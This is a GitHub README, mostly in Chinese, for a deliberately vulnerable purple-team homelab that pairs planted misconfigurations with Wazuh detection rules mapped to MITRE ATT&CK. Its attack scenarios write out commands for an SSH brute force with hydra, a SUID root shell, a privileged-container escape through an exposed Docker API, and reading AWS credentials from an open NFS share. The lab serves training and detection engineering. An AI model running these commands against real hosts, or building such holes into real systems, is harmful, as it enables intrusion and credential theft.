gregqlewis/purple-team-homelab

GitHub: gregqlewis/purple-team-homelab

基于 Ubuntu 24.04 的紫队安全实验环境,集成多种真实漏洞场景与 Wazuh SIEM 检测能力,用于攻防演练和 MITRE ATT&CK 技术研究。

Stars: 0 | Forks: 0

# Purple Team Lab:现代漏洞测试环境 [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) [![Ubuntu](https://img.shields.io/badge/Ubuntu-24.04%20LTS-orange)](https://ubuntu.com/) [![MITRE ATT&CK](https://img.shields.io/badge/MITRE-ATT%26CK-red)](https://attack.mitre.org/) 一个基于 Ubuntu 24.04 LTS 构建的综合紫队实验室环境,专为安全研究、漏洞测试和检测工程而设计。该实验室实现了真实世界的云安全错误配置和传统漏洞,并由 Wazuh SIEM 进行监控。 **作者:** Greg Lewis **博客:** [gregqlewis.com](https://gregqlewis.com) **目的:** 安全研究、CISSP 考试准备和作品集展示 ## 🎯 概述 本项目展示了一个生产级漏洞环境,其特点包括: - 模拟企业环境中发现的 **真实世界安全错误配置** - 将漏洞映射到 **MITRE ATT&CK** 框架技术 - 集成 **Wazuh SIEM** 进行检测工程 - 专注于 **云安全** 场景(Docker, AWS 凭证) - 为 **攻防** 安全操作提供实践经验 **⚠️ 警告:** 该系统是故意设计为存在漏洞的。**切勿**部署在生产网络或面向互联网的系统上。 ## 🏗️ 架构 ``` ┌─────────────────────────────────────────────────┐ │ Unraid Server │ │ │ │ ┌──────────────────────────────────────────┐ │ │ │ Ubuntu 24.04 VulnLab │ │ │ │ • SSH (weak authentication) │ │ │ │ • DVWA (vulnerable web app) │ │ │ │ • Docker API (exposed) │ │ │ │ • AWS credentials (leaked) │ │ │ │ • NFS/FTP/SMB (open shares) │ │ │ │ • SUID binaries │ │ │ │ • Vulnerable cron jobs │ │ │ │ │ │ │ │ [Wazuh Agent] ──────────────────────────┐│ │ │ └──────────────────────────────────────────┘ │ │ │ │ │ ┌─────────────────────────────────────────┼───┐│ │ │ Wazuh Manager + Graylog + OpenSearch │ ││ │ │ • Custom detection rules │ ││ │ │ • MITRE ATT&CK mapping │ ││ │ │ • Real-time alerting │ ││ │ └─────────────────────────────────────────────┘│ └─────────────────────────────────────────────────┘ ▲ │ Attack simulations │ ┌──────┴──────┐ │ Kali Linux │ │ (Attacker) │ └─────────────┘ ``` ## 🔥 已实现的漏洞 | 类别 | 漏洞 | MITRE 技术 | 风险等级 | |----------|---------------|-----------------|------------| | **认证** | 启用了 Root SSH 登录 | T1078 | 严重 | | **认证** | 弱用户密码 | T1110 | 高 | | **Web 应用** | DVWA 安装 | T1190 | 严重 | | **容器安全** | Docker API 暴露 (端口 2375) | T1611 | 严重 | | **凭证泄露** | 文件中的 AWS 凭证 | T1552.001 | 严重 | | **权限提升** | SUID bash 二进制文件 | T1548 | 严重 | | **权限提升** | 全局可写的 cron 脚本 | T1053.003 | 高 | | **网络服务** | 匿名 FTP 访问 | T1021.002 | 高 | | **网络服务** | 开放的 NFS 共享 | T1039 | 高 | | **网络服务** | SMB 访客访问 | T1021.002 | 中 | | **Web 配置** | PHP 配置文件泄露 | T1552 | 高 | **总覆盖范围:** 跨 7 个战术的 15+ 项 MITRE ATT&CK 技术 ## 🚀 快速开始 ### 前置条件 - 虚拟机管理程序 - Ubuntu 24.04 LTS Server ISO - 至少 4GB 内存,2 个 CPU 核心,50GB 磁盘 - Kali Linux(用于攻击模拟,可选) - Wazuh Manager(用于监控,可选) ### 安装 **选项 1:自动设置(推荐)** ``` # Clone repository git clone https://github.com/yourusername/purple-team-lab.git cd purple-team-lab # 运行完整安装 cd scripts/setup chmod +x install-all.sh sudo ./install-all.sh ``` **选项 2:手动分步安装** 详细的手动安装说明请参见 [docs/installation.md](docs/installation.md)。 ### 安装后 1. **验证服务:** ./scripts/verify-lab.sh 2. **配置 Wazuh Agent:** - 编辑 `/var/ossec/etc/ossec.conf` - 设置你的 Wazuh Manager IP - 重启 agent:`systemctl restart wazuh-agent` 3. **访问 DVWA:** - 导航至:`http:///DVWA/` - 登录:`admin` / `password` - 点击 "Create / Reset Database" ## 🎯 攻击场景 ### 场景 1:初始访问 → 权限提升 ``` # SSH 暴力破解 hydra -l admin -p admin ssh:// # Exploit SUID binary ssh admin@ /usr/local/bin/rootbash -p ``` ### 场景 2:通过 Docker API 进行容器逃逸 ``` # 访问暴露的 Docker API docker -H tcp://:2375 ps # 部署特权容器 docker -H tcp://:2375 run -it --privileged -v /:/host ubuntu chroot /host ``` ### 场景 3:云凭证窃取 ``` # 挂载 NFS share sudo mount -t nfs :/home /mnt/target # 提取 AWS credentials cat /mnt/target/developer/.aws/credentials ``` **完整攻击场景:** [docs/attack-scenarios.md](docs/attack-scenarios.md) ## 🛡️ 检测工程 提供了自定义 Wazuh 规则以检测所有已实现的攻击技术: - SSH root 登录尝试 - Docker API 未授权访问 - AWS 凭证文件访问 - SUID 二进制文件执行 - NFS 挂载操作 - FTP 匿名连接 - 可疑的 cron 脚本修改 **规则详情:** [docs/detection-rules.md](docs/detection-rules.md) ## 📊 MITRE ATT&CK 覆盖范围 ### 覆盖的战术 - **初始访问** (3 项技术) - **执行** (1 项技术) - **持久化** (1 项技术) - **权限提升** (3 项技术) - **凭证访问** (2 项技术) - **发现** (3 项技术) - **横向移动** (2 项技术) - **收集** (1 项技术) **完整映射:** [docs/mitre-mapping.md](docs/mitre-mapping.md) ## 📚 文档 - **[架构](docs/architecture.md)** - 详细的系统设计 - **[安装指南](docs/installation.md)** - 分步设置 - **[攻击场景](docs/attack-scenarios.md)** - 实际漏洞利用示例 - **[检测规则](docs/detection-rules.md)** - Wazuh SIEM 配置 - **[MITRE 映射](docs/mitre-mapping.md)** - ATT&CK 框架对齐 ## 🔒 安全注意事项 **本实验室故意设计为存在漏洞。请遵循以下准则:** 1. ⚠️ **切勿** 暴露在互联网上 2. ⚠️ 仅部署在隔离网络中 3. ⚠️ 使用独立的 VLAN 或物理隔离环境 4. ⚠️ 定期快照/备份以便快速恢复 5. ⚠️ 监控未经授权的访问 6. ⚠️ 不使用时销毁环境 **此环境仅用于教育目的。** ## 🎓 学习目标 本实验室有助于培养以下技能: - **进攻性安全:** 漏洞利用、渗透测试 - **防御性安全:** SIEM 配置、检测工程 - **云安全:** 容器逃逸、凭证窃取、API 安全 - **事件响应:** 攻击检测、日志分析 - **合规性:** MITRE ATT&CK 框架、安全控制 **非常适合:** - CISSP 考试准备(领域 3、5、6、7) - 安全分析师技能发展 - 云安全工程师培训 - 紫队操作实践 ## 📝 许可证 本项目根据 MIT 许可证授权 - 详见 [LICENSE](LICENSE) 文件。 ## 🙏 致谢 - **DVWA Team** - Damn Vulnerable Web Application - **Wazuh** - 开源 SIEM 平台 - **MITRE ATT&CK** - 威胁建模框架 - **Rapid7** - Metasploitable 项目灵感 ## 📧 联系方式 **Greg Lewis** - 博客:[gregqlewis.com](https://gregqlewis.com) - LinkedIn:[linkedin.com/in/gregqlewis](https://linkedin.com/in/gregqlewis) - GitHub:[@gregqlewis](https://github.com/gregqlewis) **免责声明:** 本项目仅用于教育目的。作者不对滥用此信息负责。 ## 🔖 标签 `cybersecurity` `purple-team` `vulnerability-testing` `mitre-attack` `wazuh` `docker-security` `cloud-security` `penetration-testing` `siem` `detection-engineering` `ubuntu` `cissp` `offensive-security` `defensive-security` `home-lab`
标签:AWS 凭证泄露, CISA项目, CISSP 备考, Docker 容器安全, DVWA, HTTP工具, MITRE ATT&CK 映射, SIEM 检测工程, SSH 暴力破解, Ubuntu 24.04, Wazuh, 内存分配, 安全助手, 安全运营, 扫描框架, 故意脆弱环境, 漏洞靶场, 紫队演练, 网络安全实验, 网络安全审计, 请求拦截, 防御检测